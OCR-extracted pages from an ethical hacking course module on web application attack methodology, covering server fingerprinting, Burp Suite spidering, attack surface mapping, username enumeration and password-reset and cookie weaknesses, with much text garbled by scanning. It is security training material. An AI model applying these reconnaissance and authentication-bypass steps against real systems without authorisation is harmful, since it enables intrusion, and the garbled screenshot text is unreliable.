grabbing and analysis an easy task. M odule 13 Page 1833

112 H T TP /l OK ^ Server: Date: Thu. 07 Ju l :08:16 GMT Content-Length: 1270 Content-Type: text/html / path sit-cookiet ASP ESsf0NIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; Via: 1.1 A p p lica tio n and Content Networking System Software Connection: Close Server ide ntifie d as M icro soft IIS Connection to host lo s t. C:\> :ם F IG U R E : S e r v e r I d e n t if ic a t io n / B a n n e r G r a b b in g M odule 13 Page 1834

113 F o o t p r i n t W e b I n f r a s t r u c t u r e : H i d d e n C o n t e n t D i s c o v e r y CEH J D is c o v e r th e h id d e n c o n te n t a n d f u n c tio n a lit y th a t is n o t re a c h a b le fro m th e m a in v is ib le c o n te n t to e x p lo it u s e r p riv ile g e s w ith in th e a p p lic a tio n J I t a llo w s an a tta c k e r to r e c o v e r b a c k u p c o p ie s o f liv e file s, c o n fig u ra tio n file s a n d log file s c o n ta in in g s e n s itiv e d a ta, b a c k u p a rc h iv e s c o n ta in in g s n a p s h o ts o f file s w ith in th e w e b ro o t, n e w fu n c tio n a lity w h ic h is n o t lin k e d to th e m a in a p p lic a tio n, etc. Attacker-Directed Spidering W eb spiders a u to m a tic a lly d is c o v e r th e h id d e n c o n te n t and fu n c tio n a lity by parsing HTM L fo rm and c lie n t-s id e JavaScript requests and responses W eb Spidering Tools: S OWASP Zed A tta c k Proxy A ttacker accesses all o f th e application's fu n c tio n a lity and uses an in terceptin g proxy to m o n ito r all requests and responses The in te rce p tin g proxy parses all o f th e application's responses and reports th e content and fu n c tio n a lity it e Use a u to m a tio n to o ls such as B urp s u ite to m ake huge num bers o f requests to th e w e b server in o rd e r to guess th e nam es o r id e n tifie rs o f hidden content and functionality S B u rp S p id e r - W ebs cara b discovers Tool: OWASP Zed A tta c k Proxy Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. F o o t p r i n t W e b I n f r a s t r u c t u r e : H i d d e n C o n t e n t D i s c o v e r y Crucial inform ation related to the business such as prices o f products, discounts, login IDs, and passwords is kept secret. This inform ation is usually not visible to outsiders. This inform ation is usually stored in hidden form fields. Discover the hidden content and functionality th a t is not reachable from the main visible content to exploit user privileges w ithin the application. This allows an attacker to recover backup copies of live files, configuration files, and log files containing sensitive data, backup archives containing snapshots of files w ithin the w eb root, new functionality th at is not linked to the main application, etc. These hidden fields can be determ ined w ith the help of three techniques. They are: W e b S p i d e r i n g W eb spiders autom atically discover hidden content and functionality by parsing HTML form s and client-side JavaScript requests and responses. Tools th a t can be used to discover the hidden content by means of w eb spidering include: Q Q OWASP Zed Attack Proxy Burp Spider WebScarab M odule 13 Page 1835

114 A t t a c k e r - D i r e c t e d S p i d e r i n g An attacker accesses all o f the application's functionality and uses an intercepting proxy to m o n ito r all requests and responses. The intercepting proxy parses all o f the application's responses and reports the content and functionality it discovers. The same tool used for web spidering, i.e., OWASP Zed Attack Proxy can also be used for attacker-directed spidering. B r u t e F o r c i n g Brute forcing is a very popular and easy m ethod to attack w eb servers. Use autom ation tools such as Burp Suite to make large num bers of requests to the w eb server in order to guess the names or identifiers of hidden co nte nt and functionality. M odule 13 Page 1836

115 W e b S p i d e r i n g U s i n g B u r p S u i t e C E H C«rt1fW4 itfciul NmIm C o n fig u re y o u r w e b b ro w s e r t o use Burp as a lo ca l p ro x y Access th e e n tire ta rg e t a p p lic a tio n v is itin g e v e ry single link/u R L possible, and su b m it a ll th e a p p lic a tio n fo rm s a vaila b le Brow se th e ta rg e t a p p lic a tio n w ith JavaS cript e n a b le d and disable d, and w ith cookie s enabled and disabled C heck th e site m a p g e n e ra te d by th e Burp proxy, and id e n tify a ny hidden a p p lic a tio n content o r functions C o n tin u e these steps re cu rsive ly u n til no fu rth e r c o n te n t o r fu n c tio n a lity is id e n tifie d burp suite free edition v intruder attack 1 uaet repeater sequencer ' aecoaer comparer options alpris resurs ttrset j po3mons payioaqs options [ p93!tons payloads ' options 2 payweq poamona OCT / t b? l d H ^ W 'r ' H>9t: t3 1.w w.b ln g.n e t P roxy-ccn nccciotu icecp -«1 m U w -A «j-n t: M o x tlla /S.a (Utnclowx NT t. 2; IfOWM) AppleVebK1c/S39.^ ikitojl, Like Cecko) -hrone, ב ג. u.1 ::9.3 a S a ta r1/ Ic cvpt:»/ * R»Z«x«x: h ttp ://*» w.b in g.c ocv /י.- anwwj ito c c M q-b i \c~*l id-«ccc7 '70 6 SC ICD3 ASD2 E AB E PE0S7SD 12 S54tP ORN-1OP RB A A ccept-e ncoding: g z 1 p,d e lla te, 9dcH len din 46*. 0 matches loauflit rssponso weosovce *woe*?00 nw r.-nm rrnfleri hf< OTT /th 7 1 d - l. 4M7«C150040::3 U 1id ] l, I H TTP/I. I MvO.. kl1.im.lliuj.uvl P xoxy-c o nn tction : kwp-««l.lve כ comment!reouesr 1 lm t lg *n e : K o x ilw S.O (Window * NT C. 2; V0V «) A p pl«0» bx lt/33 7. «{KBTHL, like Oeeko) Chrowe/22.0. l i229.9 Srttor1 /S /י Accept: Mttrtn h t t p : / / v rf.m rf n g.co» / U y«s/i«a1:ch?q-blk*i11id *««CCC7«70<SClCPJA9P:SA,SS9<J 5ir1C575D1:594*POPH-rcrRBA Accvpt-Zncodisvg: cjzip, d * f lu te, aclch Accept-langua{re: en-us, en: g8.0 iccepc-cnatrsec: JSO -88SS-l,uc -8;«r=0.7, ';q *0.3 http ://w ww.portswigger.net Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S p i d e r i n g U s i n g B u r p S u i t e ^ ^ Source: h ttp ://w w w.po rtsw ir g er.n et Burp Suite is an integrated platform fo r attacking w eb applications. It contains all the Burp tools w ith num erous interfaces betw een them, designed to facilitate and speed up the process of attacking an application. Burp Suite allows you to com bine manual and a u to m a te d techniques to enum erate, analyze, scan, attack, and exploit w eb applications. The various Burp tools w ork together effectively to share inform ation and allow findings identified w ithin one tool to form the basis o f an attack using another. W eb spidereing using Burp Suite is done in the follow ing m anner: 1. Configure your w eb browser to use Burp as a local proxy 2. Access the entire target application visiting every single link/url possible, and subm it all the application form s available 3. Browse the target application w ith JavaScript enabled and disabled, and w ith cookies enabled and disabled 4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions M odule 13 Page 1837

116 5. Continue these steps recursively until no fu rth e r content or functionality is identified burp intruder repeater window about burp suite free edition v intruder repeater sequencer decoder j comparer options alerts spider ו * 7 נ f target 1 positions payloads [ options scanner attack type sniper 2 payload positions GET / t h? i d = S I I S i p id = H T T P /1.1 H o s t: t s 4.m m.b in g. n e t P r o x y - C o n n e c tio n : k e e p - a liv e U s e r - A g e n t: H o z i l l a / 5. 0 (V in d o v s NT 6. 2 ; 0V 64) A p p le V e b K it/ (KHTML, l i k e G ecko) C h ro m e / S a f a r i/ A c c e p t: * / * R e f e r e r : h t t p : / / v v v. b in g.c o m /im a g e s / 3 e a r c h? q b ik e s 4 id *6 C C C C1CD3A9D2EABE86351FE8575D12594SF0RM IQFRBA A c c e p t- E n c o d in g : g z i p, d e f l a t e, s d c h length: 465 ciear auto refresh clear J 0 matches intruder attack 1 attack save columns Filter showing all items results request target ' positions [ payloads ' options position payload Web Service Attack Web Service Attack. sfc status error time... length ח ה comment baseline request request [ response raw params headers j hex GET / t h? i c l l & p i d H T T P /1. 1 H o s t: t s 4. m m.b in g. n e t P t o x y - C o n n e c tio n : k e e p - a l iv e U s e r - A g e n t: M o z i l l a / 5. 0 (W indow s NT 6. 2 ; ) A p p le W e b K it/ (KHTML, l i k e G ecko) C h ro ro e / S a f a r i/ A c c e p t: * / * R e f e r e r : h t t p : / / v v v.b in g.c o m /im a g e s /s e a rc h? q = b ik e s S id = 6 C C C C lc D 3 A 9 D 2 E A B E FE8575D12S94SFORM=IQFP.BA A c c e p t- E n c o c lin g : g z i p, d e f l a t e, s d c h A c c e p t- L a n g u a g e : e n - U S,e n ;q = 0.8 A c c e p t- C h a r s e t: I S O , u t f - 8 ; q = 0. 7, * ;c [ 0.3 r i An «_r- 1ngp (z h z h z h : inished F IG U R E : S e r v e r I d e n t if ic a t io n / B a n n e r G r a b b in g M odule 13 Page 1838

117 W e b S p i d e r i n g U s i n g M o z e n d a W e b A g e n t B u i l d e r CEH J M o z e n d a W e b A g e n t B u ild e r c r a w l s t h r o u g h a w e b s i t e a n d h a r v e s t s p a g e s o f i n f o r m a t i o n Copyright by E&Couacil. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S p i d e r i n g U s i n g M o z e n d a W e b A g e n t B u i l d e r Source: h ttp ://w w w.m o ze n d a.co m M ozenda W eb Agent Builder is a W indow s application used to build your data extraction project. It crawls through a w ebsite and harvests pages o f inform ation. W eb Agent Builder is a tool suite th a t includes an intuitive Ul and a browser-based instruction set. Setting up your craw ler is as simple as pointing and clicking to navigate pages and capture the inform ation you want. M odule 13 Page 1839

118 א ם - Ouildci (m occnda WebAgentl (not saved) - Mocenda Web Agent Me & 0 I cot Agent ^ ^ hrtp-,7wxw be«ouy rc n ) *» A * m u n g..- j;v w - c» «- /- ;^ -, - M ) K 7 O rm htip top1«... S O - c i p New Action Use the tools below to peifoint actions on tlie oauc י Share 1 8 Pi 0d «t r Cick an item O f Capture text or image Writ* o Rovtew Set user input ט Choose son order Date: Newest Create a list of items Selected Action Modify the behavior of the selected action y View action properties & Change item location Customer Rating U Lovt Mrnnv iv atn9/2010 3/JJPTCRZYfromRO-IIOMC, CA Readsi ru re/6w3 Picture Quolty 5.0 Sound Quatty ^ ; &0 Features SO Use the tools above to add a new action to this page 0 modify the behavior of the currently selected action Whet's greet about i t WAS VERY EASYTC SET UP, REMOTE EASYTO USE FOR FEATURES UP *GREAT =>CTl.RE AMD FEATJRES VERY USER FREMDLY. EASY TO SET Would you recommend this product to a friend?! yes ^ Was T tt r»/ew reep U? res Ho Repor nappr33na:e review Siere J-isF.oBft. Page L Begin Rem List Item Namelist Capture Item Name Capture Rice capture. Rating Capture Model Click Item End Uit Begin Item list Review Ratingl... Capture Review Rating Capture Review Capture Would recommend v[2j/e /drv[4)/dirl 1 [ד«[ 2 Customer Retina & & & & '. U fu rryp ictjre C'/IWO'C ReviewRating Review Would recommend EZ^H * What great about it WASVERVEAS. Yet 3.0 Wttifs great about it. Great SoundWh... No d.o Whet's greet about it: nicefeatuiesw... Yes AJ) What's great aoout it goodprice, loo... Yet נl1 / toady njytr[!]/ F IG U R E : W e b S p id e r in g U s in g M o z e n d a W e b A g e n t B u ild e r M odule 13 Page 1840

119 Attack Web Servers Attack Authentication Mechanism Attack Session Attack Attack Management Data Connectivity Web Services Mechanism Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p H a c k i n g M e t h o d o l o g y A t t a c k W e b S e r v e r s Once you conduct full scope fo otprin tin g on w eb infrastructure, analyze the gathered inform ation to find the vulnerabilities th a t can be exploited to launch attacks on w eb servers. Then a tte m p t to attack w eb servers using various techniques available. Each and every website or w eb application is associated w ith a w eb server th at has code fo r serving a w ebsite or web application. The attacker exploits the vulnerabilities in the code and launches the attacks on the w eb server. Detailed inform ation about hacking w eb servers will be explained on the follow ing slides. M odule 13 Page 1841

120 H a c k i n g W e b s e r v e r s 5. Once the attacker identifies the w eb server environm ent, attackers scan fo r known vulnerabilities by using a w eb server vulnerability scanner. Vulnerability scanning helps the attacker to launch the attack easily by identifying the exploitable vulnerabilities present on the w eb server. Once the attacker gathers all the p ote ntia l vulnerabilities, he or she tries to exploit th em w ith the help of various attack techniques to com prom ise the w eb server. In order to stop the w eb server from serving legitim ate users or clients, the attacker launches a DoS attack against the w eb server. You can launch attacks on the vulnerable w eb server w ith the help of tools such as UrIScan, Nikto, Nessus, Acunetix W eb Vulnerability Scanner, W eblnspect, etc. M odule 13 Page 1842

121 ג 2 Ethical Hacking and C ounterm easures W e b S e r v e r H a c k i n g T o o l : W e b l n s p e c t CEH J J J W e b ln s p e c t id e n tifie s s e c u r ity v u ln e r a b ilitie s in th e w e b a p p lic a tio n s It ru n s in te r a c tiv e scans u s in g a sophisticated user in terface A tta c k e r can e x p lo it id e n tifie d v u ln e ra b ilitie s to c a rry o u t w e b s e rv ic e s a tta c k s t ו *" י * " *י** - w o u nload.hpsm artupdate.com Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. W e b s e r v e r H a c k i n g T o o l : W e b l n s p e c t Source: h ttp s://d ow n lo a d.h psm a rtu pd a te.com W eblnspect softw are is w eb application security assessment softw are designed to thoroughly analyze today's com plex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate w eb application scanning results. It identifies security vulnerabilities th a t are undetectable by tra d itio n a l scanners. Attackers can exploit the identified vulnerabilities fo r launching w eb services attacks. M odule 13 Page 1843

122 Im *. Tm*. Uf ««*. M* «J! " *!** t. a י י' ^ נ - X. [OtWNWI j jj>------m wit a*w י ** acm*. הי יו s!!!»; *ftm tm>v * L1_J,*- י **r Crmtt «M>*«MM tax 1«M» i*m»! *..; * * ז IM.' I kmbnmk t»wm u w *- * ~י»~י~ zsrcl. h u ץ W v ~ OwlMKvti H I 1 t!»«*» י**י «!! * I I t «" I p 1 1 5s^, hk«l«1 t 1 י 9 l : * w 1 - " -»w»11nn>»1t(m)»n «m# n! mwmm *!** *MHiMt 8 F IG U R E : W e b ln s p e c t T o o l S c r e e n s o t M odule 13 Page 1844 Ethical Hacking and C ounterm easures Copyright by EC-C0l1nCil

123 Attack Web Servers Attack Authentication Mechanism Attack Session Attack Attack Management Data Connectivity Web Services Mechanism Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p H a c k i n g M e t h o d o l o g y A n a l y z e W e b A p p l i c a t i o n s Analyzing the w eb application helps you in identifying d ifferent vulnerable points th a t can be exploitable by the attacker fo r com prom ising the w eb application. Detailed inform ation about analyzing a w eb application and identifying the entry points to break into the w eb application will be discussed on the follow ing slides. M odule 13 Page 1845

124 Analyze Web Applications A EH itfciul N«h««A n a ly z e t h e a c t iv e a p p lic a t i o n 's f u n c t i o n a l i t y a n d t e c h n o l o g ie s in o r d e r t o i d e n t i f y t h e a t t a c k s u r f a c e s t h a t it e x p o s e s Identify Entry Points for U ser Input R e vie w th e g e n e ra te d HTTP re q u e s t to id e n tify th e in p u t e n try p o in ts Identify Server-Side Functionality O bserve th e a p p lic a tio n s re ve a le d to th e c lie n t to id e n tify th e server-sid e s tru c tu re a n d fu n c tio n a lity Identify Server-Side Technologies F in g e rp rin t th e te c h n o lo g ie s a c tiv e o n th e s e rv e r using v a rio u s fin g e rp rin t te c h n iq u e s such as HTTP fin g e rp rin tin g Map the A tta ck Surface Id e n tify th e various attack surfaces uncovered by th e applications and th e vu ln e ra b ilitie s th a t are associated w ith each one Copyright by E&Ctuacil. All Rights Reserved.!Reproduction is Strictly Prohibited. j A n a l y z e W e b A p p l i c a t i o n s W eb applications have various vulnerabilities. First, basic knowledge related to the w eb application has to be acquired by the attacker and then analyze the active application's fu n ctio n a lity and technologies in order to identify the attack surfaces th a t it exposes. Id en tify Entry Points fo r User Input The entry point of an application serves as an entry point fo r attacks; these entry points include the front-end w eb application th a t listens fo r HTTP requests. Review the generated HTTP request to identify the user input entry points. Id en tify Server-side Functionality Server-side functionality refers to the ability o f a server th a t executes programs on o u tp u t w eb pages. Those are scripts th at reside and also allow running interactive w eb pages or websites on particular w eb servers. Observe the applications revealed to the client to identify the serverside structure and functionality. Id en tify Server-side Technologies Server-side technologies or server-side scripting refers to the dynam ic generation of w eb pages th a t are served by the w eb servers, as they are opposed to static w eb pages th a t are in the storage of the server and served to w eb browsers. Fingerprint the technologies active on the server using various fin ge rp rin t techniques such as HTTP fingerprinting. M odule 13 Page 1846

125 M ap th e A ttack Surface Identify the various attack surfaces uncovered by the applications and the vulnerabilities th at are associated w ith each one. M odule 13 Page 1847

126 A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y E n t r y P o i n t s f o r U & e r I n p u t Examine URL, HTTP Header, query string parameters, POST data, and cookies to determine all user input fields Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referer, Accept, Accept-Language, and Host headers Determine URL encoding techniques and other encryption measures implemented to secure the web traffic such as SSL Tools used: «Burp Suite» HttPrint ט WebScarab ט OWASP Zed Attack Proxy. Copyright by E&CaiHGO. All Rights Reserved.!Reproduction is Strictly Prohibited. A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y E n t r y P o i n t s f o r U s e r I n p u t Q During the w eb application analysis, attackers identify entry points fo r user input so that they can understand the w ay the w eb application accepts or handles the user input. Then the attacker tries to find the vulnerabilities present in input m echanism and tries to exploit th em so th a t attacker can associate w ith or gain access to the web application. Examine URL, HTTP Header, query string param eters, POST data, and cookies to determ ine all user input fields. 0 Identify HTTP header param eters th at can be processed by the application as user inputs such as User-Agent, Referrer, Accept, Accept-Language, and Host headers. 0 D eterm ine URL encoding techniques and o the r encryption measures im plem ented to secure the w eb traffic such as SSL. The tools used to analyze w eb applications to identify entry points fo r user input include Burp Suite, H ttp rint, W ebscarab, OWASP Zed A ttack Proxy, etc. M odule 13 Page 1848

127 A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y S e r v e r - S i d e T e c h n o l o g i e s Perform a detailed s e rv e r f in g e r p r in tin g, analyze HTTP headers and HTML source code to identify server side technologies E x a m in e URLs for file extensions, directories, and other identification information Examine the e r r o r p a g e messages E x a m in e s e s s io n to k e n s : a JSESSIONID - Java «ASPSESSIONID-IIS server «ASP.NET_Sessionld ASP.NET» PHPSESSID - PHP U i w MicrosafMIS/6 0 Microxaft-IISJfl 0 O o p s! Apache;2 0.32!Fedora) Micro* oft-iis'6.0.0 SunONE Webserver 0 0, Net&c«*pe-Er4e<pr*e/4 1 \ 1 Server Error in,/reportserver' Application. Could not find the permission set named 'ASP.Net'. Description: Anunhanded exception occurred during the execution of the current web request. Pleasereviewthe stack trace for more information about the error and where it originated in the code. ' > Server Side Technologies < Version Information: Microsoft.Net Framework Version ; ASP.Net Version Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y S e r v e r - S i d e T e c h n o l o g i e s Source: http ://n et-sq ua re.co m A fter identifying the entry points through user inputs, attackers try to identify server-side technologies. The server-side technologies can be identified as follows: 1. Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server side technologies Examine URLs fo r file extensions, directories, and o the r identification inform ation Examine the error page messages Examine session tokens: e JSESSION ID - Java ASPSESSION ID -IIS server e e ASP.NET_SessionlD-ASP.NET PHPSESS ID -P H P M odule 13 Page 1849

128 w e b s e rve r fin ge rp rin ting rep ort h«p://jueev1>oyr.com/error.aspx P H host port banner reported banner deduced e e s i www airs ahara net 80 Microsoft-IIS/6 0 Mlcrosoft-IIS/6.0 L l l 1 easicoas t fight com Apache/ (Fedora) Apache/2.0.x V 1 4 www redhat.com 4 : 3 ~y Apache Apache/ V ' n www cnn com ~ Apache Apache/2 0.x chaseon1jne.chase.com 443 JPMC1.0 SunONE Webserver 6.0. Netscape-Emerpnse/4.1 i wwwfoundstone.com 80 WebSTAR Apache/2.0.x V ן ן I wwwwalmart.com SC Microsoft-IIS/6 0.0 Apache/2.0.x V ffuu por. / 30sc ware com 80 Yes we are using ServerMask! Microsoft-lIS/4.0. M»crosoft-IIS5.0 ASP.NET. Microsoft- I IS/5.1 < ;-< Server Side Technologies Server Error in /ReportServer' Application. Could n o t fin d the permission set named 'ASP. Net'. Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Version Information: Microsoft Net Framework Version ; ASP.Net Version F IG U R E : I d e n t if y S e r v e r - S id e T e c h n o lo g ie s M odule 13 Page 1850

129 A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y s* c i S e r v e r - S i d e F u n c t i o n a l i t y H i 5! Examine pagesource and URLs and make an educated guess to determine the internal structure and functionality of web applications Tools ^ >> used: GNU Wget Teleport Pro BlackWidow gnu.org tenmax.com & E x a m i n e U R L SSL A ASPX Platform A h t t p s : / / w w w.j u g g y b o y. c o m / c u s t o m e r s. a s p x? n a m e = e x i s t i n g % 2 0 c l i e n t s & i s A c t i v e = O S s ta rtd a te = 2 0 % 2 F ll% 2 F S e n d D a te = 2 0 % 2 F 0 5 % 2 F l& s h o w B y = n a m e Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y S e r v e r - s i d e F u n c t i o n a l i t y Once the server-side technologies are determ ined, identify the server-side functionality. This helps you to find the potential vulnerabilities in server-side functionalities. Examine page source and URLs and make an educated guess to determ ine the internal structure and functionality o f w eb applications. T o o l s U s e d : 0 % W g e t Source: h ttp ://w w w.g n u.o rg GNU W get is fo r retrieving files using HTTP, HTTPS, and FTP, the m ost widely-used Internet protocols. It is a non-interactive com m and-line tool, so it can be called from scripts, cron jobs, term inals w ith o u t X-W indows support, etc. T e l e p o r t P r o Source: h ttp ://w w w.te n m a x.co m Teleport Pro is an all-purpose high-speed tool fo r getting data from the Internet. Launch up to ten sim ultaneous retrieval threads, access passw ord-protected sites, filte r files by size and M odule 13 Page 1851

130 type, and search fo r keywords. Capable o f reading HTML 4.0, CSS 2.0, and DHTML, T T eleport can find all files available on all websites by means of w eb spidering w ith server-side image map exploration, autom atic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities. B l a c k W i d o w Source: BlackW idow scans a site and creates a com plete profile of the site's structure, files, external links and even link errors. BlackW idow will dow nload all file types such as pictures and images, audio and MP3, videos, docum ents, ZIP, programs, CSS, M acrom edia Flash,.pdf, PHP, CGI, HTM to M IM E types from any websites. Download video and save as many d ifferent video form ats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, W M V, ASF, MOV, QT, VOB, etc. It can now be controlled program m atically using the built-in Script Interpreter. Examine URL SSL A ASPX Platform A h t t p s : //w w w.ju g g yb o y. com /custom ers. a sp x? n a m e = e xistin g % 2 0 clie n ts& isa ctive = 0&startDate=20%2Fll%2F2010SendDate=20%2F05%2F2011&showBy=name V - > D a ta b a s e C o lu m n < F IG U R E : B la c k W id o w If a page URL starts w ith https instead o f http, then it is known as a SLL certified page. If a page contains an.aspx extension, chances are th a t the application is w ritte n using ASP.NET. If the query string has a param eter nam ed showby, then you can assume th at the application is using a database and displays the data by th at value. M odule 13 Page 1852

131 A n a l y z e W e b A p p l i c a t i o n s : M a p t h e A t t a c k S u r f a c e CEH Urt1fw4 ilhiul lutbm I n f o r m a t i o n m m A t t a c k I n f o r m a t i o n A t t a c k Client-Side Validation In je c tio n A tta c k, A u th e n tic a tio n A tta c k Injectio n A ttack P rivile g e E scalation, Access Controls D atabase In te ra c tio n SQL In je c tio n, Data Leakage C le a rte xt C o m m u n ic a tio n Data T h e ft, Session H ija c k in g File U p lo a d and D o w n lo a d D irectory Traversal Error Message In fo rm a tio n Leakage D ispla y o f U se r-s u p p lie d Data Cross-Site Scripting Interaction Injectio n Dynam ic Redirects R e d ire c tio n, H e ader In je c tio n A p plication Codes B uffer O verflow s Login U s e rn a m e E n u m e ra tio n, Passw ord B ru te-f o rce Third -P arty A pplication K n o w n V u ln e ra b ilitie s E xploitation Session State Session H ija c k in g, Session Fixa tio n W eb S e rve r S o ftw a re K n o w n V u ln e ra b ilitie s E xploitation Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. A n a l y z e W e b A p p l i c a t i o n s : M a p t h e A t t a c k S u r f a c e There are various entry points fo r attackers to com prom ise the netw ork, so proper analysis o f the attack surface m ust be done. The m apping of the attack surface includes thorough checking of possible vulnerabilities to launch the attack. The follow ing are the various factors through which an attacker collects the inform ation and plans the kind of attack to be launched. M odule 13 Page 1853

132 I n f o r m a t i o n A t t a c k I n f o r m a t i o n!^ m m a a m A t t a c k Client-Side Validation Injection Attack, Authentication Attack Injection Attack Privilege Escalation, Access Controls Database Interaction SQL Injection, Data Leakage Cleartext Communication Data Theft, Session Hijacking File Upload and Download Directory Traversal Error Message Information Leakage Display of User-Supplied Data Cross-Site Scripting Interaction Injection Dynamic Redirects Redirection, Header Injection Application Codes Buffer Overflows Login Username Enumeration, Password Brute-Force Third-Party Application Known Vulnerabilities Exploitation Session State Session Hijacking, Session Fixation Web Server Software Known Vulnerabilities Exploitation F IG U R E : M a p t h e A t t a c k S u r fa c e M odule 13 Page 1854

133 Attack Web Servers Attack Authentication Mechanism Attack Session Attack Attack Management Data Connectivity Web Services Mechanism Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p H a c k i n g M e t h o d o l o g y In w eb applications, the authentication functionality has m any design loopholes such as bad passwords, i.e. short or blank, com m on dictionary w ords or names, passwords set the same as user name, and those still set to default values. The attacker can exploit the vu lnerabilities in the a uth e n tica tio n m echanism fo r gaining access to the w eb application or netw ork. The various threats th a t exploit the weaknesses in the authentication mechanism include netw ork eavesdropping, brute force attacks, dictionary attacks, cookie replay attacks, credential theft, etc. M odule 13 Page 1855

134 A t t a c k A u t h e n t i c a t i o n M e c h a n i s m CEH A t t a c k A u t h e n t i c a t i o n M e c h a n i s m U ^ M ost of the authentication mechanisms used by w eb applications have design flaws. If an attacker can identify those design flaws, he or she can easily exploit the flaws and gain unauthorized access. The design flaws include failing to check password strength, insecure transportation of credentials over the Internet, etc. W eb applications usually authenticate their clients or users based on a com bination o f user name and password. Hence, the a u th en tica tion m echanism attack involves identifying and exploiting the user name and passwords. U s e r N a m e E n u m e r a t i o n User names can be enum erated in tw o ways; one is verbose failure messages and the o the r is predictable user names. V e r b o s e F a ilu r e M e s s a g e ' In a typical login system, the user is required to enter tw o pieces of inform ation, th a t is, user name and password. In some cases, an application will ask fo r some m ore inform ation. If the user is trying to log in and fails, then it can be inferred th a t at least one of the pieces o f the inform ation th a t is provided by the user is incorrect or inconsistent w ith the other inform ation provided by the user. The application discloses th a t particular inform ation th a t is provided by the user was incorrect or inconsistent; it will be providing ground fo r an attacker to exploit the application. M odule 13 Page 1856

135 Example: Account <usernam e> not found The password provided incorrect Account <usernam e> has been locked out P r e d ic t a b le U s e r N a m e s Some o f the applications autom atically generate account user names according to some predictable sequence. This makes it very easy way fo r the attacker w ho can discern the sequence fo r potential exhaustive list o f all valid user names. P a s s w o r d A t t a c k s Passwords are cracked based on: Password functionality exploits Password guessing Brute-force attacks S e s s i o n A t t a c k s The follow ing are the types of session attacks em ployed by the attacker to attack the authentication mechanism: Session prediction Session brute-forcing Session poisoning C o o k i e E x p l o i t a t i o n The follow ing are the types o f cookie exploitation attacks: Cookie poisoning Cookie sniffing Cookie replay M odule 13 Page 1857

136 User Name Enumeration CEH UrtifWd ItliK4I luilwt I f l o g i n e r r o r s t a t e s w h i c h p a r t o f t h e u s e r n a m e a n d p a s s w o r d i s n o t c o r r e c t, g u e s s t h e u s e r s o f t h e a p p l i c a t i o n u s i n g t h e t r i a l - a n d - e r r o r m e t h o d N o te : U ser nam e e n u m e ra tio n fro m ve rb o se e rro r m essages w ill fa il if th e a p p lic a tio n im p le m e n ts a c c o u n t lo c k o u t p o licy i.e., locks account a fte r a certain num ber o f failed login attem pts Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. U s e r N a m e E n u m e r a t i o n S ource: h ttp s ://w o rd p re s s.c o m U ser n a m e e n u m e ra tio n h elps in guessin g lo g in IDs and p a ssw o rd s o f users. If th e lo g in e rro r sta te s w h ic h p a rt o f th e u ser n a m e and p a ssw o rd a re n o t c o rre c t, guess th e users o f th e a p p lic a tio n using th e tr ia l- a n d - e r r o r m e th o d. Look a t th e fo llo w in g p ic tu re th a t show s e n u m e ra tin g user n am es fro m v e rb o s e fa ilu re m essages: M odule 13 Page 1858

137 W o r d P r e s s.c o m W o r d P r e s s.c o m ERROR Invalid or username Lost your password? ERROR: The password you entered (or the or username nmmatthews is incorrect Lost vour password? or username rin i.m a tth e w s Password or Username rin im a tth e w s Password Remember Me Log In Remember Me Log In Register I Lost your password? Register I Lost your password? Back to WordPress com - BacMo WordPress com Username rin i.m atthew s does n ot exist Username successfully enum erated to rin im a tth ew s F I G U R E : U s e r N a m e E n u m e r a t i o n Note: U ser n a m e e n u m e ra tio n fro m v e rb o s e e rro r m essages w ill fa il if th e a p p lic a tio n im p le m e n ts a c c o u n t lo c k o u t p o lic y, i.e., locks th e a c c o u n t a fte r a c e rta in n u m b e r o f fa ile d lo g in a tte m p ts. Som e a p p lic a tio n s a u to m a tic a lly g e n e ra te a c c o u n t user n am es based on a se q u e n ce (such as u s e r lo l, u s e rl0 2, e tc.), and a tta c k e rs can d e te rm in e th e se q u e n ce and e n u m e ra te v a lid user nam es. M odule 13 Page 1859

138 Password Attacks: Password Functionality Exploits CEH D e te rm in e passw o rd change fu n c tio n a lity w ith in th e a p p lic a tio n by s p id e rin g th e a p p lic a tio n o r cre a tin g a login a c c o u n t Try ra n d o m strings fo r'o ld Password', 'N e w Password', and 'C o n firm th e N e w P a ssw ord' fie ld s and ana lyze e rro rs to id e n tify vulnerabilities in password change functionality 'F o rg o t Passw ord' fe a tu re s g e n e ra lly p resent a challenge to th e user; if th e n u m b e r o f a tte m p ts is n o t lim ite d, a tta c k e r can guess th e c h a lle n g e a n s w e r su ccessfully w ith th e help o f social engineering A p p lic a tio n s m a y also send a u n iq u e re c o v e ry URL o r existin g passw ord to an e m a il address s p e cifie d by th e a tta c k e r if th e challenge is solved "R e m e m b e r M e " fu n c tio n s are im p le m e n te d using a sim ple p e rsiste n t c o o k ie, such as R e m e m b e ru s e r= ja s o n o r a p e rsiste n t session id e n tifie r such as Remem beruser=aby A tta cke rs can use an e n u m e ra te d user nam e o r p re d ic t th e session id entifier to bypass auth e n tica tio n m 